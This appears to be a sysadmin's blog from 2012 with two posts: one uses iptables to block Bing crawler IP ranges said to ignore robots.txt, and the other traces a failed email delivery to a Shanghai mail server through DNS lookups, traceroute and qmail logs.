65.52.110.17 - - [18/May/2012:12:58:31 +0000] "GET /ja/members/sluconi/activity/groups/?acpage=3 HTTP/1.1" 200 21509 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.147 - - [18/May/2012:12:58:32 +0000] "GET /cs/members/joyull/activity/favorites/ HTTP/1.1" 200 14216 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.108.69 - - [18/May/2012:12:58:32 +0000] "GET /zh-tw/members/moniques/activity/friends/?acpage=15 HTTP/1.1" 200 18509 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.147 - - [18/May/2012:12:58:32 +0000] "GET /pt/members/luquejee/activity/groups/?acpage=12 HTTP/1.1" 200 18612 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.110.17 - - [18/May/2012:12:58:35 +0000] "GET /fi/activity/?acpage=66 HTTP/1.1" 200 16466 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.51 - - [18/May/2012:12:58:58 +0000] "GET /members/filozofem/profile/ HTTP/1.1" 200 13354 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
^C

The ranges in use by bing appear to be 207.46.*, and 65.52.*, 157.55.17.*
A quick check to see who owns those ranges confirms that yes, it is indeed the evil empire.


NetRange: 65.52.0.0 - 65.55.255.255
CIDR: 65.52.0.0/14
OriginAS:
NetName: MICROSOFT-1BLK
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment
RegDate: 2001-02-14
Updated: 2012-03-20
Ref: http://whois.arin.net/rest/net/NET-65-52-0-0-1

NetRange: 207.46.0.0 - 207.46.255.255
CIDR: 207.46.0.0/16
OriginAS:
NetName: MICROSOFT-GLOBAL-NET
NetHandle: NET-207-46-0-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Assignment
RegDate: 1997-03-31
Updated: 2004-12-09
Ref: http://whois.arin.net/rest/net/NET-207-46-0-0-1

NetRange: 157.54.0.0 - 157.60.255.255
CIDR: 157.60.0.0/16, 157.56.0.0/14, 157.54.0.0/15
OriginAS: AS8075
NetName: MSFT-GFS
NetHandle: NET-157-54-0-0-1
Parent: NET-157-0-0-0-0
NetType: Direct Assignment
Comment: Abuse complaints will only be responded to if sent to abuse@microsoft.com and abuse@msn.com.
RegDate: 1994-04-28
Updated: 2010-08-19
Ref: http://whois.arin.net/rest/net/NET-157-54-0-0-1

As you can see, they do have an abuse email contact. Which bounces.
Need I say anything more?

As I could readily identify that they were completely ignoring the file, even *after* downloading it from logs (eg see a request for the robots.txt file, then more requests for folders explicitly denied inside the robots.txt file! from the same ip), I decided to take some action to block them.

The following will block MSN Bot (Bing) from hammering a site.

#Block 207.46.*
iptables -A INPUT -s 65.52.0.0/14 -j DROP
#Block 65.52.*
iptables -A INPUT -s 207.46.0.0/14 -j DROP
#Block 157.55.17.*
iptables -A INPUT -s 157.55.17.0/24 -j DROP

Note that the 3rd range actually goes from 157.54.0.0 – 157.60.255.255
I wasn’t actually seeing any evilness from the 157.56 – 157.60.* range, so I’ve ignored them. Letting some Bing stuff through is a good idea (assuming they can behave themselves), as we don’t want to lose SEO goodness on one of the less^H popular search engines.

A quick tail of the logs later, and I could see that the multitude of bandwidth leeching MSN / Bing bots were gone. Plus, the site loaded much much faster.

A quick google (haha), for MSN / BING spiders doing the same thing to others revealed that we aren’t alone, and a number of people complain about exactly the same issue.

According to Bing, they do respect the protocol.

http://www.bing.com/community/site_blogs/b/webmaster/archive/2009/08/10/crawl-delay-and-the-bing-crawler-msnbot.aspx

My own findings, and a check of others findings show that they do not.

This search might be of interest –
http://www.google.com/search?&q=bing+ignoring+robots.txt

We’re not the only ones –
http://techie-buzz.com/microsoft/bing-crawler-msnbot-stupid.html

http://www.semwisdom.com/blog/msnbot-stupid-plain-evil

As we’ve verified that the ip ranges in use by the crawlers are indeed owned by Microsoft, its pretty evident that they’re lying.

C’est la vie.

Flattr this!

As our clients probably know, we run our own email servers.

Email is one of those things that looks simple on the surface, but isn’t necessarily so simple when it comes down to troubleshooting.

As is typical, the day started with a trouble ticket from a client letting us know that they were having difficulties receiving mail from one of their clients.

I was also given enough information to start troubleshooting without having to ask for additional information, which was nice, as this sometimes takes time to get.

We do have an email issues page with some notes and instructions for what is needed linked off of our webmail page; the issues page is here.

The bounce message supplied included headers, so it was fairly straightforward to work out what server they were using.

The sender (junglefish.com) was seeing the below as an error, when emailing us:

Failure notice from mxttb2.hichina.com:

I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

As we have multiple mail servers in different countries, I first needed to identify which server they were connecting too, so I could check logs.

I usually do this by searching through our logs for occurrences of the senders domain.

If that doesn’t find any results, then I lookup what their mail servers should be and check for entries in our logs from those servers.

This doesn’t always guarantee a result, but in this case I had enough information to get a result.

Our sender was coming from junglefish.net, so I checked to see what mail servers they might use.

To check what mail servers are used, we check the MX (Mail Exchanger) records for their domain. In this instance I used dig – a dns lookup tool.

dig mx junglefish.net

junglefish.net. 3600 IN MX 10 mail.junglefish.net.
junglefish.net. 3600 IN MX 0 mail.junglefish.net.

We can see that mail is served by mail.junglefish.net for the junglefish.net domain. We can also see that the MX records are incorrect, as their are 2 entries pointing at the same server with different preferences. This won’t cause mail to be rejected though, so its not the issue we’re looking for.

Next we check the ip address for mail.junglefish.net

Some mail servers are on shared servers, so the domain name does not always match up with the ip address. We need the ip address as we need to search the logs for that, or addresses close to that range.

A simple ping should return their ip address.


ping mail.junglefish.net

Reply from 218.244.133.134...

In this instance, mail.junglefish.net points at 218.244.133.134

As mail servers also require valid reverse DNS entries, I also checked if that ip address has a valid reverse dns entry with nslookup.

nslookup 218.244.133.134
Server: ::1
Address: ::1#53

Non-authoritative answer:
134.133.244.218.in-addr.arpa name = out133-134.mxttb2.hichina.com.

In this case, their reverse DNS is out133-134.mxttb2.hichina.com
Just to double check thats valid, I pinged the name, and got a valid response.

ping out133-134.mxttb2.hichina.com
PING out133-134.mxttb2.hichina.com (218.244.133.134) 56(84) bytes of data.
64 bytes from out133-134.mxttb2.hichina.com (218.244.133.134): icmp_req=1 ttl=51 time=29.0 ms

So, we’ve done some basic checks –

We’ve checked that the sender domain has MX records.
We’ve checked that their mail server exists, and it has both forward and reverse dns.

Next up, I need to search the logs for connections from their server.

If I search for connections to our mail servers from 218.244.133 I saw the following:

USA – no results.
CN – no results.
CN2 – rejections.

Looking at the logs, I immediately saw that our server was rejecting their mail for failing MFCHECK

@400000004fb3951e1f2ee324 tcpserver: ok 8328 mail.smartshanghai.com:211.144.68.52:25 out133-134.mxttb2.hichina.com:218.244.133.134::51396
@400000004fb3951e28966374 jgreylist[8328]: 218.244.133.134: OK known
@400000004fb3952504477f44 qmail-smtpd[8328]: MFCHECK fail [218.244.133.134] junglefish.net

The MFCHECK code checks the domain portion of the envelope sender address (in the MAIL FROM command) to make sure it’s a real domain which has at least one MX record. This prevents spammers from being able to use phony domain names in their forged sender addresses.

In this case, our server was rejecting mail from them due to this failure.

As we didn’t have sufficient logs to see *why* this was happening, I turned on full connection logging for their ip address, and asked them to send us another mail.

They did so, and I checked the logs for what was happening.
(see below)

@400000004fb48fad0004630c tcpserver: ok 17315 mail.smartshanghai.com:211.144.68.52:25 out133-134.mxttb2.hichina.com:218.244.133.134::50611
400000004fb48fae061430c4 17315 > 220 mail.smartshanghai.com NO UCE ESMTP
400000004fb48fae090ae354 17315 < EHLO mxttb2.hichina.com 400000004fb48fae090decac 17315 > 250-mail.smartshanghai.com NO UCE
400000004fb48fae090df094 17315 > 250-SIZE 0
400000004fb48fae090df47c 17315 > 250-PIPELINING
400000004fb48fae090df864 17315 > 250 8BITMIME
400000004fb48fae0c26ec7c 17315 < MAIL FROM:
400000004fb48fc0396b0344 17315 > 451 DNS temporary failure (#4.3.0)
400000004fb48fc10a1b68f4 17315 < QUIT

In this case, their server started off the conversation with
EHLO mxttb2.hichina.com

As mail servers need to provide a valid domain that they claim to be sending from, I checked if mxttb2.hichina.com existed.
It didn't.

So, that was the reason.

Having identified that, I whitelisted their server ip address for the MFCHECK portion of our checks, and asked them to resend mail again.

Unfortunately this did not let them send mail as they failed another test!

@400000004fb495f92bd72ec4 qmail-smtpd[22644]: Received-SPF: error (mail.smartshanghai.com: error in processing during lookup of junglefish.net: DNS problem)

As SPF relies on TXT records, I tried to manually lookup their DNS

dig TXT junglefish.net

; <<>> DiG 9.7.3 <<>> TXT junglefish.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 11512 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

That failed.

Hmmmm.

I then tried using an oversea's server to lookup their domain.

dig ns junglefish.net

; <<>> DiG 9.7.3 <<>> ns junglefish.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41739 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;junglefish.net. IN NS ;; ANSWER SECTION: junglefish.net. 2931 IN NS ns54.domaincontrol.com. junglefish.net. 2931 IN NS ns53.domaincontrol.com.

That lookup worked.

So, we're getting somewhere.

We've identified a number of issues, and its starting to look like their DNS servers are blocked in China from a cursory test.

To confirm this I checked if using their DNS servers worked from within China.

Check from ns53 fails -
nslookup
> server ns53.domaincontrol.com
Default server: ns53.domaincontrol.com
Address: 216.69.185.27#53
Default server: ns53.domaincontrol.com
Address: 2607:f208:206::1b#53
> junglefish.net
;; connection timed out; no servers could be reached

Check from ns54 fails -
> server ns54.domaincontrol.com
Default server: ns54.domaincontrol.com
Address: 208.109.255.27#53
Default server: ns54.domaincontrol.com
Address: 2607:f208:302::1b#53
> junglefish.net
;; connection timed out; no servers could be reached
>

As those failed, I tried pinging their server.
ping ns54.domaincontrol.com
PING ns54.domaincontrol.com (208.109.255.27) 56(84) bytes of data.
^C
--- ns54.domaincontrol.com ping statistics ---
8 packets transmitted, 0 received, 100% packet loss, time 7056ms

Ping test fails

Next, I tried to see where it was failing with traceroute.

root@edm:/home/shanghaiguide# traceroute ns54.domaincontrol.com
traceroute to ns54.domaincontrol.com (208.109.255.27), 30 hops max, 60 byte packets
1 reserve.cableplus.com.cn (211.144.79.254) 5.723 ms 5.899 ms 6.078 ms
2 211.154.92.89 (211.154.92.89) 3.860 ms 3.878 ms 3.936 ms
3 211.154.64.94 (211.154.64.94) 3.545 ms 3.608 ms 3.686 ms
4 211.154.72.181 (211.154.72.181) 4.154 ms 4.421 ms 4.419 ms
5 202.96.222.73 (202.96.222.73) 4.657 ms 4.632 ms 4.635 ms
6 61.152.81.189 (61.152.81.189) 4.671 ms 5.401 ms 5.367 ms
7 61.152.86.50 (61.152.86.50) 6.387 ms 6.330 ms 6.301 ms
8 202.97.33.86 (202.97.33.86) 8.003 ms 7.941 ms 7.743 ms
9 202.97.33.254 (202.97.33.254) 7.829 ms 7.656 ms 7.647 ms
10 202.97.50.114 (202.97.50.114) 175.491 ms 175.982 ms 171.405 ms
11 202.97.52.218 (202.97.52.218) 155.507 ms 155.755 ms 155.750 ms
12 218.30.54.150 (218.30.54.150) 191.389 ms 191.306 ms 191.544 ms
13 * * *
14 * * *
15 * * *
16 * * *
17 * * *

Traceroute fails (at 218.30.54.150)

whois 218.30.54.150
% [whois.apnic.net node-5]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 218.30.32.0 - 218.30.55.255
netname: CHINANET-US-POP
descr: Chinanet POP in American
descr: 201 S. Lake Ave. Suite 604, Pasadena, CA 91101
country: CN
admin-c: CH93-AP
tech-c: CH93-AP
mnt-by: MAINT-CHINANET
changed: hostmaster@ns.chinanet.cn.net 20020221
status: ALLOCATED NON-PORTABLE
source: APNIC

So, it looks like there are 3 issues.

1) Invalid MX setup (although this is not going to stop mail from failing).
2) Their Mail server claims to be a non-existent domain.
(Note that this seems to have been subsequently rectified, as that domain now resolves).
3) Their DNS servers are blocked within China.

To solve that, I added an external DNS lookup from outside the country.

In summation, simple things may involve multiple issues, as we can see from above!

In this case, we resolved the issue by whitelisting the senders ip to bypass the MFCHECK failure. We then added external DNS resolvers to our Mail Servers to bypass the block.
Lastly informed the sender, and the client of all of the issues noted so that they could be resolved.

Archives

Categories

Tags

PHOTOSTREAM